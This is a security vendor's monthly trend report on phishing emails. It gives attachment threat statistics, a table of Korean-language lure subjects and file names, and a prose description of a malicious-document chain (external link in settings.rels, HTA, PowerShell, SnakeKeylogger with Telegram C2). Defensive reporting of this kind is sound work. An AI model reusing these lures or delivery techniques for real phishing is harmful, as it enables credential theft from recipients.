Trends Report on Phishing Emails in February 2025
1. Statistics on Attachment Threats in February 2025
In February 2025, the most prevalent threat type among phishing email attachments was Phishing (78%). This is the type where threat actors use HTML and other scripts to mimic login pages, advertising page layouts, logos, and fonts to create deceptive pages that can lure users into entering their account credentials. Subsequently, the threat actors transmit this information to their C2 server or lead users to fake sites. This type of phishing attack not only uses scripts but also includes hyperlinks in documents like PDFs to trick users into visiting phishing sites created by threat actors.
The second most common threat type is Trojan (12%). This malware tricks users into executing it by using double extensions or filenames with legitimate names.
The third most common threat type is malware that downloads additional malware from C2 (Downloader, 6%), followed by malware that steals user information (Infostealer, 4%), with FormBook being a prominent example. Following that, security vulnerability exploits (Exploit, <1%) were detected.
Compared to last month, the percentage of phishing malware increased significantly from 44% to 78% this month. The quantity also increased in addition to the percentage, showing that overall phishing threats were relatively higher. This is also seen in the statistics under [Trend in Phishing (FakePage) Distribution Volume].
Figure 1. Statistics on attachment threats
The statistics reflect the recent trends of threats posed by phishing emails by providing data on the distribution changes of samples in each category over the past six months. In addition, statistics on the extensions of attachments found in phishing emails allow users to identify the file formats used in such emails. Users can access these statistics and more in the original ATIP report.
2. List of Phishing Emails Distributed in Korean
| Email Subject | Attachment |
| FedEx Import Tax Invoice – 9914538167182 | Invoice-9433.html |
| Customs Invoice Tax | Forwarder SHIPMENT_AWB.html |
| Electronic Tax Invoice (*&*) -> Accounting Firm (****) Open in a New Window | NTS_eTaxInvoice.html |
| *** (***->Co., Ltd. *** Engineering ********) | NTS_eTaxInvoice.html |
| Bank Remittance Receipt | jj_Remittance_receipt.html |
| New Electronic Tax Invoice (********Co. ,Ltd.) ->) Open in a New Window | NTS_eTaxInvoice.html |
| Pending Custom AWB Invoice | AWB_custom invoice.html |
| Email Allocation: (98% total) | ******@******.co.kr_update.shtml |
| Your package has arrived at our office. | sunilgupta shipping receipt793048897.html |
| Customs Payment Notification | {Inv_Doc}.html |
| Quotation Request_***Tech_20250219 | PO-G0170-PF3F-25-0329.cab |
| Quotation Request//H**-059690-PO-05870-********-Order | H**-059690-PO-05870-*********-Order.zip |
| Re: ✈FedEx Cargo arrival notice | fdxdoc_inv.shtml |
| FedEx shipment AWB release date has been set for 2/14/2025 3:03:28 a.m. | SHIPMENT DOCUMENT.html |
| FedEx Custom AWB Invoice and Document | Custom AWB invoice.htm |
| Attach new invoice to FedEx Billing Online | Fedex invoice.html |
| DHL Shipment Invoice and AWB | DHL Custom AWB invoice.htm |
| AWB Shipping Document – Customs Fee | Fedex shipment AWB omh.html |
| ✈Information on DHL EXPRESS Additional Services Related to Export and Import | Inv_Doc.shtml |
| [Korea****] Buyer Inquiry Notice – 9567030369121 | Inquire-2362.html |
| The tax invoice issued to [******.] has arrived. | NTS_eTaxInvoice.html |
| [DHL KOREA] Invoice Notice: D01937677 | D01405477.html |
| FW: Request to Check Suspicious Email | PO-0058934.shtml |
| DHL 3037193913 (CS INSTRUMENT **** & CO) – Cargo Arrival Notice (Expected) | 3037193913_AWB_20250106_440_20250106.html |
Figure 2. Some of the phishing emails distributed in Korean
3) Case Study on Phishing Email Distribution
We analyzed representative cases by attachment format (Script, Document, Compress) to identify the phishing email attacks that took place this month. This month, phishing emails were distributed for malware of the downloader type, which uses a fake page, and malware of the infostealer type, which uses a document attachment. An “External Link” is inserted into the ‘\word\_rels\settings.rels’ file within the document, so when users open the document, the malicious behavior is triggered. Also, there has been a recent increase in cases where executables (.exe) developed in .NET are compressed and distributed in phishing emails. Readers can find additional information such as the C2 address, analysis details, and the body of the phishing email that distributed the malware in the original ATIP report.
Figure 3. Attached document (.docx)
This document contains an “external link” in the “\word\_rels\settings.rels” file, and upon execution, it downloads and executes additional malware from the C2. The additionally downloaded malware, when executed as an HTA file, downloads more malware again via PowerShell.
Figure 4. Malware distributed as an attachment in Compress format
The malware that is ultimately executed is a type of SnakeKeylogger malware, which collects various information present on the system (PC) and sends it to the C2. The threat actor is using a Telegram channel as the C2.
※ Please refer to the attachment for more details.
